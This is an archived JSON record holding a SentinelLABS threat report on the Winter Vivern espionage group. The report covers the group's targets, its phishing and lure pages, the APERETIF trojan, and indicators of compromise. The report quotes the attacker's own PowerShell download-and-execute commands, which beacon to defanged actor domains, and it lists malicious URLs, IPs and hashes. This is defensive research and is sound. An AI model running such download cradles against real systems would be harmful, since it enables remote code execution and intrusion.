{
	"id": "8b931d55-0fc3-4230-a6be-51ddb66f8cc5",
	"created_at": "2026-04-06T00:11:17.813921Z",
	"updated_at": "2026-04-10T03:30:21.354056Z",
	"deleted_at": null,
	"sha1_hash": "caf6edfe587677a28840c3d8eab2b3480e08c052",
	"title": "Winter Vivern | Uncovering a Wave of Global Espionage",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2846365,
	"plain_text": "Winter Vivern | Uncovering a Wave of Global Espionage\r\nBy Tom Hegel\r\nPublished: 2023-03-16 · Archived: 2026-04-05 16:17:21 UTC\r\nExecutive Summary\r\nSentinelLABS has conducted an investigation into Winter Vivern Advanced Persistent Threat (APT) activity,\r\nleveraging observations made by The Polish CBZC and Ukraine CERT. Our research has uncovered a previously\r\nunknown set of espionage campaigns and targeting activities conducted by this threat actor.\r\nOur analysis indicates that Winter Vivern’s activities are closely aligned with global objectives that support the\r\ninterests of Belarus and Russia’s governments. The APT has targeted a variety of government organizations, and in a\r\nrare instance, a private telecommunication organization.\r\nThe threat actor employs various tactics, such as phishing websites, credential phishing, and deployment of malicious\r\ndocuments, that are tailored to the targeted organization’s specific needs. This results in the deployment of custom\r\nloaders and malicious documents, which enable unauthorized access to sensitive systems and information.\r\nBackground on Winter Vivern\r\nThe Winter Vivern Advanced Persistent Threat (APT) is a noteworthy yet relatively underreported group that operates with\r\npro-Russian objectives. DomainTools initially publicized the group in early 2021, naming it based on an initial command-and-control beacon URL string “wintervivern,” which is no longer in use. Subsequently, Lab52 shared additional analysis\r\nseveral months later, identifying new activity associated with Winter Vivern.\r\nThe group has avoided public disclosure since then, until recent attacks targeting Ukraine. A part of a Winter Vivern\r\ncampaign was reported in recent weeks by the Polish CBZC, and then the Ukraine CERT as UAC-0114. In this activity,\r\nCERT-UA and the CBZC collaborated on the release of private technical details which assisted in our research to identify a\r\nwider set of activity on the threat actor, in addition to new victims and previously unknown specific technical details.\r\nOverall, we find that the Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope\r\nof their attacks. Our analysis indicates that Winter Vivern activity aligns closely with global objectives that support the\r\ninterests of Belarus and Russia’s governments.\r\nTargeted Organizations\r\nOur analysis of Winter Vivern’s past activity indicates that the APT has targeted various government organizations since\r\n2021, including those in Lithuania, India, Vatican, and Slovakia.\r\nRecently linked campaigns reveal that Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of\r\nForeign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. Of particular interest is\r\nthe APT’s targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing\r\nwar.\r\nThe threat actor’s targeting of a range of government and private entities highlights the need for increased vigilance as their\r\noperations include a global set of targets directly and indirectly involved in the war.\r\nLuring Methodology\r\nhttps://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 1 of 6\n\nWinter Vivern’s tactics have included the use of malicious documents, often crafted from authentic government documents\r\npublicly available or tailored to specific themes. More recently, the group has utilized a new lure technique that involves\r\nmimicking government domains to distribute malicious downloads.\r\nIn early 2023, Winter Vivern targeted specific government websites by creating individual pages on a single malicious\r\ndomain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of\r\nForeign Affairs, and the Security Service of Ukraine.\r\nMalicious Page Mimicking cbzc.policja.gov.pl\r\nIn mid 2022 the attackers also made an interesting, lesser observed, use of government email credential phishing webpages.\r\nOne example is ocspdep[.]com , which was used in targeting users of the Indian government’s legitimate email service\r\nemail.gov.in .\r\nhttps://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 2 of 6\n\nemail.gov.in Login Page\r\nLooking back at less recent activity, we can see in December 2022 the group likely targeted individuals associated with the\r\nHochuzhit.com (“I Want to Live”) project, the Ukraine government website offering guidance and instructions to Russian\r\nand Belarus Armed Forces seeking to voluntarily surrender in the war. In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.\r\nWhen the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends\r\nto rely on shared toolkits, and the abuse of legitimate Windows tools.\r\nView Into The Arsenal\r\nWinter Vivern APT falls into a category of scrappy threat actors, being quite resourceful and able to accomplish a lot with\r\npotentially limited resources while willing to be flexible and creative in their approach to problem-solving.\r\nRecent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as\r\nvirus scanners to prompt downloads of malware from attacker-controlled servers.\r\nhttps://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 3 of 6\n\nFake Virus Scan Loaders\r\nIn the case of malicious documents, such as the Hochu Zhit themed XLS files, PowerShell is called through a macro.\r\nSpecifically, Invoke-Expression cmdlet is executed, beaconing to the malicious destination of ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php .\r\npowershell.exe -noexit -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};\r\niex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')\"\r\nOne malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the\r\nsample. We identified a related sample following similar use, although it is less complete in malicious design. These samples\r\nalign with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script\r\nloaders. Known samples are PE32 executables, written in Visual C++, with a compilation timestamp of May 2021. We\r\nassess the threat actor shifted from these original executables to the delivery of batch files with PowerShell scripting, with\r\noverlap in their use.\r\nf39b260a9209013d9559173f12fbc2bd5332c52a C:\\Users\\user_1\\source\\repos\\Aperitivchick\\Release\\SystemProtector.pdb\r\na19d46251636fb46a013c7b52361b7340126ab27\r\nC:\\Users\\user_1\\source\\repos\\Aperitivchick\r\n2\\Release\\SystemProtector.pdb\r\nAPERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com . As with the previous script, the trojan makes use of whomami within PowerShell in\r\nits initial activity to beacon outbound for further instructions and/or downloads.\r\nactor-controlled.exe -c \"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\r\n$a=whoami;\r\niex (New-Object Net.WebClient).DownloadString(\"\"\"hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=\r\nAPERETIF also uses the signatures.php?id=1 URI through HTTPS GET requests. The group made use of compromised\r\nWordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 4 of 6\n\nincludes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the\r\ndownload location for APERETIF during initial attack stages.\r\nMoreover, Winter Vivern employs other intrusion techniques, such as exploiting application vulnerabilities to compromise\r\nspecific targets or staging servers. An attacker-controlled server was found to host a login page for the Acunetix web\r\napplication vulnerability scanner, which may serve as a supplementary resource for scanning target networks and potentially\r\nused to compromise WordPress sites for malware hosting purposes.\r\nAcunetix Vulnerability Scanner Login\r\nConclusion\r\nThe Winter Vivern cyber threat actor, whose operations of espionage have been discussed in this research, has been able to\r\nsuccessfully carry out their attacks using simple yet effective attack techniques and tools. Their ability to lure targets into the\r\nattacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and\r\nstrategic intent in their operations. The dynamic set of TTPs and their ability to evade the public eye has made them a\r\nformidable force in the cyber domain.\r\nIndicators of Compromise\r\nhttps://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 5 of 6\n\nType Indicator\r\nDomain bugiplaysec[.]com\r\nDomain marakanas[.]com\r\nDomain mfa_it_sec@outlook[.]com\r\nDomain ocs-romastassec[.]com\r\nDomain ocspdep[.]com\r\nDomain security-ocsp[.]com\r\nDomain troadsecow[.]com\r\nURL hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i\r\nURL hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php\r\nURL hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o\r\nURL hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php\r\nIP 176.97.66[.]57\r\nIP 179.43.187[.]175\r\nIP 179.43.187[.]207\r\nIP 195.54.170[.]26\r\nIP 80.79.124[.]135\r\nFile SHA1 0fe3fe479885dc4d9322b06667054f233f343e20\r\nFile SHA1 83f00ee38950436527499769db5c7ecb74a9ea41\r\nFile SHA1 a19d46251636fb46a013c7b52361b7340126ab27\r\nFile SHA1 a574c5d692b86c6c3ee710af69fccbb908fe1bb8\r\nFile SHA1 c7fa6727fe029c3eaa6d9d8bd860291d7e6e3dd0\r\nFile SHA1 f39b260a9209013d9559173f12fbc2bd5332c52a\r\nSource: https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nhttps://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA",
		"MISPGALAXY"
	],
	"references": [
		"https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/"
	],
	"report_names": [
		"winter-vivern-uncovering-a-wave-of-global-espionage"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434277,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/caf6edfe587677a28840c3d8eab2b3480e08c052.pdf",
		"text": "https://archive.orkl.eu/caf6edfe587677a28840c3d8eab2b3480e08c052.txt",
		"img": "https://archive.orkl.eu/caf6edfe587677a28840c3d8eab2b3480e08c052.jpg"
	}
}